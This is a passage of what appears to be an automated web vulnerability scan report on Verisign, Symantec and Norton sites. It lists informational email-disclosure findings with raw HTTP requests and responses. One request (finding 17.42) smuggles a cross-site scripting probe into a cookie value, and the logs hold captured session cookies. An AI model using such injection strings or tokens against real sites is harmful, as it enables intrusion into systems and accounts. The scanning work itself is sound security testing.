GET /common.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 56081 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // copied from google3/java/com/google/caribou/antlers/fin/jsdata //------------------------------------------------------------------------ // This file contains common utilities and basic javascrip...[SNIP]... ss = token.substring(1, (end != -1) ? end : token.length); } else if (address == "") { name += token; } i += token.length; } // Check if it's a simple email address of the form "jlim@google.com " if (address == "" && name.indexOf("@") != -1) { address = name; name = ""; } name = CollapseWhitespace(name); name = StripQuotes(name, "'"); name = StripQuotes(name, "\""); addre...[SNIP]...
17.39. http://query.verisign.com/search
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.com
Path: /search
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.40. http://query.verisign.com/uri.js
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.com
Path: /uri.js
Issue detail
The following email address was disclosed in the response:
Request
GET /uri.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 17596 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // Copyright 2006 Google Inc. // All Rights Reserved. /** * @fileoverview * Implements RFC 3986 for parsing/formatting URIs. * * @author msamuel@google.com */ /** * creates a uri from the string form. The parser is relaxed, so special * characters that aren't escaped but don't cause ambiguities will not cause * parse failures. * * @return {URI|Nu...[SNIP]...
17.41. https://query.verisign.com/search
Summary
Severity: Information
Confidence: Certain
Host: https://query.verisign.com
Path: /search
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.42. https://renewals.symantec.com/renewals/chat_form.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/chat_form.jsp
Issue detail
The following email address was disclosed in the response: sales@symantecsmbrenewals.com
Request
GET /renewals/chat_form.jsp HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:39:05 GMT Content-Type: text/html Content-Length: 15726 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- BEGIN IMPORT_INCLUDE--> <!--END IMPORT_INCLUDE--> <html> <head><ti...[SNIP]... <a href="mailto:sales@symantecsmbrenewals.com ">...[SNIP]... <a href="mailto:sales@symantecsmbrenewals.com ">...[SNIP]... <a href="mailto:sales@symantecsmbrenewals.com ">...[SNIP]...
17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/symantec_omniture/s_code_20100217.js
Issue detail
The following email address was disclosed in the response:
Request
GET /renewals/js/symantec_omniture/s_code_20100217.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:37 GMT Content-Length: 30123 Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /* Rainmaker changes to set the report suite. */ if (location.href.inde...[SNIP]... =s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;" +"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc ^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t" +";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id...[SNIP]...
17.44. http://us.norton.com/beta/overview.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /beta/overview.jsp
Issue detail
The following email address was disclosed in the response: betafeedback@symantec.com
Request
GET /beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39170 <meta http-equiv="refresh" content="0;url=http://us.norton.com/beta"> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Beta Software - Norton 360 Version...[SNIP]... <a href="mailto:betafeedback@symantec.com ">betafeedback@symantec.com </a>...[SNIP]...
17.45. http://us.norton.com/familyresources/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /familyresources/index.jsp
Issue detail
The following email addresses were disclosed in the response: advertising@norton.com, marian@norton.com
Request
GET /familyresources/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=64 Date: Fri, 09 Sep 2011 21:47:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67586 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Family Resource Center: Internet Safety for Children, Teens &amp; Adults...[SNIP]... <a href="mailto:marian@norton.com ">...[SNIP]... <a href="mailto:advertising@norton.com ">...[SNIP]...
17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /scripts/colorbox/norton/jquery.colorbox-min.js
Issue detail
The following email address was disclosed in the response:
Request
GET /scripts/colorbox/norton/jquery.colorbox-min.js HTTP/1.1 Host: us.norton.com Proxy-Connection: keep-alive Referer: http://us.norton.com/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AKNORTDC=0
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 09 Feb 2011 19:22:17 GMT ETag: "23e8-4d52e969" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 9192 Cache-Control: public, max-age=2112 Date: Fri, 09 Sep 2011 21:30:57 GMT Connection: close // ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+ // Copyright (c) 2010 Jack Moore - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php (function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi...[SNIP]...
17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v
Summary
Severity: Information
Confidence: Certain
Host: https://vipmanager.verisign.com
Path: /vipmgr/createtrialaccount.v
Issue detail
The following email address was disclosed in the response: viptrial-support@verisign.com
Request
GET /vipmgr/createtrialaccount.v HTTP/1.1 Host: vipmanager.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <META http-equiv="Content-Type" content="te...[SNIP]... <a href="mailto:viptrial-support@verisign.com ">viptrial-support@verisign.com </a>...[SNIP]...
17.48. http://vipmobile.verisign.com/home.v
Summary
Severity: Information
Confidence: Certain
Host: http://vipmobile.verisign.com
Path: /home.v
Issue detail
The following email address was disclosed in the response:
Request
GET /home.v HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:50 GMT Server: Apache Content-Type: text/html;charset=utf-8 Content-Length: 16260 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vipmobile@verisign.com ">...[SNIP]...
17.49. https://vipmobile.verisign.com/home.v
Summary
Severity: Information
Confidence: Certain
Host: https://vipmobile.verisign.com
Path: /home.v
Issue detail
The following email address was disclosed in the response:
Request
GET /home.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:52:06 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 16260 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vipmobile@verisign.com ">...[SNIP]...
17.50. https://vipmobile.verisign.com/supportedphones.v
Summary
Severity: Information
Confidence: Certain
Host: https://vipmobile.verisign.com
Path: /supportedphones.v
Issue detail
The following email address was disclosed in the response:
Request
GET /supportedphones.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:46 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 1508897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vipmobile@verisign.com ">...[SNIP]... <a href="mailto:vipmobile@verisign.com " style="white-space:nowrap;">vipmobile@verisign.com </a>...[SNIP]...
17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /about/profile/policies/privacy.jsp
Issue detail
The following email address was disclosed in the response:
Request
GET /about/profile/policies/privacy.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1721 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82442 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Complete Privacy Policy - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"...[SNIP]... <a href="mailto:privacy@symantec.com ">privacy@symantec.com </a>...[SNIP]... <a href="mailto:privacy@symantec.com ">privacy@symantec.com </a>...[SNIP]...
17.52. http://www.symantec.com/business/theme.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /business/theme.jsp
Issue detail
The following email addresses were disclosed in the response: billing@verisign.com, channel-partners@verisign.com, eca-authentication@verisign.com, eca-sales@verisign.com, eca-support@verisign.com, renewals-team@verisign.com, verisales@verisign.com
Request
GET /business/theme.jsp?themeid=contact-verisign HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/verisign-worldwide/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621569527-New%7C1336357569527%3B%20event69%3Devent69%7C1336357569528%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D806960442771%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621570007; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 51820 Cache-Control: public, max-age=1145 Date: Fri, 09 Sep 2011 21:26:48 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>VeriSign Authentication Services, now a part of Symantec - SSL Certificates, Extended Validation SSL, User Authenti...[SNIP]... <a href="mailto:verisales@verisign.com ">verisales@verisign.com </a>...[SNIP]... <a href="mailto:renewals-team@verisign.com ">renewals-team@verisign.com </a>...[SNIP]... <a href="mailto:channel-partners@verisign.com ">channel-partners@verisign.com </a>...[SNIP]... <a href="mailto:eca-support@verisign.com ">eca-support@verisign.com </a>...[SNIP]... <a href="mailto:eca-authentication@verisign.com ">eca-authentication@verisign.com </a>...[SNIP]... <a href="mailto:eca-sales@verisign.com ">eca-sales@verisign.com </a>...[SNIP]... <a href="mailto:billing@verisign.com ">billing@verisign.com </a>...[SNIP]...
17.53. http://www.symantec.com/connect/
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/
Issue detail
The following email address was disclosed in the response: Customer_Certifications@Symantec.com
Request
GET /connect/ HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%2
52526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000 Vary: Cookie ETag: "1315602201" Content-Type: text/html; charset=utf-8 X-Varnish: 1369354087 1369326710 X-Varnish-Cache: HIT X-Varnish-Hits: 287 Vary: Accept-Encoding Content-Length: 80043 Cache-Control: public, max-age=1794 Date: Fri, 09 Sep 2011 21:34:13 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... Exams for FREE – Register now! The first 100 candidates (customers or partners) to register for an SCS Certification or STS Accreditation exam will be able to take an exam for FREE! Email Customer_Certifications@Symantec.com or Partner... </div>...[SNIP]...
17.54. http://www.symantec.com/searchg/common.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /searchg/common.js
Issue detail
The following email address was disclosed in the response:
Request
GET /searchg/common.js HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; 